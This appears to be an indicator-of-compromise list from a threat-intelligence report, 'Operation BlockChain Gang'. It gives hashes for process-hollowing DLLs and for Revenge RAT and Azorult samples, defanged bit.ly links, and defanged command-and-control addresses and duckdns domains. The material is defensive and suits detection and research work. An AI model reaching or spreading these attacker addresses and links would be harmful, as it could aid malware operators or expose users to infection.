5b28b71b197141869dac8c16881969de79d7075b3f90db74e2617fa10e5c616c

7a1d62eb5ac162b77282fd4724e05fd3f15a71d35af8557f39328d7e20bb7f54

9194f1c345d4c0c1ead6ed8360d8f4cb437db46992193361a4c13536b4e6f482

88fa4316062f115bda55f5ee813f142f656f4c93c080e3eafc2489bcf484a72c

22badea27fc78704cda90ce08fda6b5a3e316305116e0a723a19fbba5f207075

7bccace1fc2511f69b33de773a09ad394646628245ac60b6304b70da1bd7bace

A68d40c0b98f85108ff33b470966bb0ed8318cb2d6512731943209c61d31e445

94b3ed920d553046515973d608637afda0c148ba222444a0d4e29815beaa93a5

160fc09d02379c2975f39fdb2881f702785b898fd526193d55027c1392ad6211

1fc35c164170bbaf6c9c1c08ef8f947c450b4591fbbff1aedf76bcb31396e68f

A1311f60a4e77f922e8e1f5bc6c4a738cd9baf4b7ab5ba20d117c8553ea98888

46d2f4e6ef71dcbab6657a7bd2e6921250801475c816278d3246260f5fdbd8af

7d5c10ec72855d6be418dbde4225b413de2d37d02894f9667859c7f5ddcf0f95

7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87


Bitly URLs

hxxp://bit[.]ly/myldsahsgkdasjhasjkdhgaksdhaki

hxxp://bit[.]ly/mfuckingstlunlayliyabsdhgagaaki

hxxp://bit[.]ly/loghdsjssss6278haaki

hxxp://bit[.]ly/mylmounmeidahsgkdasjmadarchoodaki

hxxp://bit[.]ly/phlim6hshshugthsg27

hxxp://bit[.]ly/8hdjkashhassahsh

hxxp://bit[.]ly/8hsshjahassahsh

hxxp://bit[.]ly/dajhmypwmnhsjsh

hxxp://bit[.]ly/phlim826gthsg27

hxxp://bit[.]ly/nlaylialsjsjsjy

hxxp://bit[.]ly/umyakasuc

hxxps://bitly[.]com/2jsjsjahyh

hxxps://bitly[.]com/lunlay63b

hxxps://bitly[.]com/a62179hsdh

hxxps://bitly[.]com/26hshyh

hxxps://bitly[.]com/2j938jahyh

hxxps://bitly[.]com/lunlay63b

hxxp://bitly[.]com/2KpPwHC

hxxps://bitly[.]com/laygyloraylagaaki

hxxps://bitly[.]com/8hsshjahassahsh

hxxp://bitly[.]com/2k2oGvP


.Net DLL used to Process Hollowing

acacbd880ed58976436624fd027850d41c505bd9653d6b195744d7e8b91fd560

5f344ad3b50d75f9073efeb38cdac1c369b7b3c67862c908103ab69a7b7e1837

84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6

Cded233b6a7bfd0f4430d79766706db62ea6992fad6e2a8506a5d81f64ba7e19

a318ce12ddd1b512c1f9ab1280dc25a254d2a1913e021ae34439de9163354243

3f0d0471a67a4fff6847f41da120e47e969e4b014ec31f4bdbd2d15a960074df

E22d550423f05eb685ad060a71d58b306e31c473d2d0cacf5794ec424fd3f393

Bb37f30311a0ade4a807a5de7f078efd6b3af815aa4305a4bcc17f6d4b5ee9e6


Revenge RAT

C0878de0c284e2d7fff24672b6bd80d315222bc50a949426401304bd77f56eb7

c9b3a21aec8f7f484120c16d7ee70853020dc9fd2e881d504903c371d1028937


Delphi version of Azorult RAT

F6c868883d1d5e4a2049969b4caa8a09fb6818fcf0249e8a1dc3d64372ae4f37

Df92917eb8b7d0f9b893ec82aa471db341e0bc04a6a677e390517fee9f5fd03d

bb077ea088c3c754f89b18c0e33378182b289d34d885e13365a93dc0c7c93589


Command and Control Nodes

hxxp://216[.]170[.]126[.]146/2ky/index.php

hxxp://216[.]170[.]126[.]146/ahsan/index.php

hxxp://23[.]249[.]163[.]135/index.php

hxxp://speeddfox[.]duckdns[.]org

hxxp://rgalldmn[.]duckdns[.]org



Threat Summary: Operation BlockChain Gang; Advanced Exploits, Commodity Tools

This is Prevailion's first Threat Summary Report. For more information on this type of report and why we publish them, click here ....